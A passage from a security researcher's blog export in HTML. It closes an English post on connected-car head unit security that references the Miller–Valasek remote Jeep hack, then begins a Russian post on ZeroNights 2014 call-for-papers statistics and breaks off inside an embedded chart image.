<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img alt="https://habrastorage.org/files/f68/dd2/125/f68dd2125c074fa8b4d9003acc6de869.png" height="454px;" src="https://lh3.googleusercontent.com/dQmJutcOq1nHLi27EXfRn4fJMi08yazLAGCF-HVAWigaf1MTQHuFPuWmpPHFNdL4p4YFEI5qyvYxoekFruGQf3qn1RpUECUCgcz57Y0UREyAspHHHw_MOoWavgRTbnbyeZ9Sk-7472bipFq6" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624px;" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.6666666666667px; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>Instead of </b></span><span style="font-family: 'Segoe UI', sans-serif; font-size: 10pt; line-height: normal;"><b>conclusion</b></span><b style="font-family: Calibri; font-size: 14.6666666666667px; line-height: 1.295; white-space: pre-wrap;">.</b><br />
</div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> I've written quite a lot but nothing concrete. Nevertheless my aim was to draw your attention to key components: Head Unit (and I mean IVI), describe the corresponding risks and what actions vendors and developers take to minimize them. Today there is a plenty of information about CAN networks: some resources have shared access, some ECUs are vulnerable to DoS and brute force attacks or you can even read data from them. But all these attacks don't have practical application if you want to perform "remote attack on car from the Internet". I only tried to show current situation in car industry, the main target and some of its problems (taking into account Connected Car features)</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in my humble opinion</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. I didn't want to scare or encourage anyone so this note does not apply to be vendors advertisement and was not made to convince you that "wow, hackers can hack everything!". But they definitely can and this summer on Black Hat in Las Vegas same guys Charlie and Chris will show remote penetration on real car, get access to CAN, gain control over critical ECU - </span><a href="https://www.blackhat.com/us-15/briefings.html#Chris-Valasek" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.blackhat.com/us-15/briefings.html#Chris-Valasek</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. I don't know if the HU is used as entry point or for privilege escalation, but the show will be spectacular and will demonstrate real capabilities :) Secure driving to you!</span></div>
<br />
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">UPD</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">: Now we have more details about Charlie and Chris attack (</span><a href="http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">), and i can say that HU/IVI system was involved, looks like Cruise Control or and access to CAN but believe that more technical details will be disclosed on BlackHat!
</span></div>
<div>
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 14.666666666666666px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com1tag:blogger.com,1999:blog-4711612808026791519.post-86447290939883283372015-06-22T03:27:00.000-07:002015-07-23T12:58:15.550-07:00Zeronights 2014 CFP. Статистика работы Defcon-Russia группы.<div dir="ltr" style="text-align: left;" trbidi="on">
Zeronights 2014 CFP. Статистика работы Defcon-Russia группы<br />
Лучше поздно, чем никогда! Думаю, этот девиз не вполне подходит, но, тем не менее...<br />
У меня была подготовлена статистика по работе нашей CFP-комиссии, и по докладам прошлого ZeroNights. Никто ей особо не заинтересовался, но раз она у меня есть, я ей поделюсь.<br />
<br />
Итак, в прошлом году состоялась 4-ая ZeroNights. Немного бесполезной статистики, но, тем не менее, забавной, + кое-что о том, какие «злобные» люди сидят в комиссии от Defcon Russia.<br />
<div>
<br /></div>
<br />
<a name='more'></a><br /><br />
<h3 style="text-align: left;">
Доклады</h3>
<br />
Нам прислали немало докладов, а по нашим меркам много - 58 заявок.<br />
Приятно, что зарубежные спикеры испытывают интерес к конференции. Посмотрим, как изменится эта статистика в 2015г. Тем не менее, на ЗН 2012, было 56% забугорных желающих из всего около 60 заявок. В целом, считаю интерес стабильным, и довольно высоким, учитывая и холодный месяц ноябрь, и гемор с отечественной визой.<br />
<br />
<img src="data:image/png;base64,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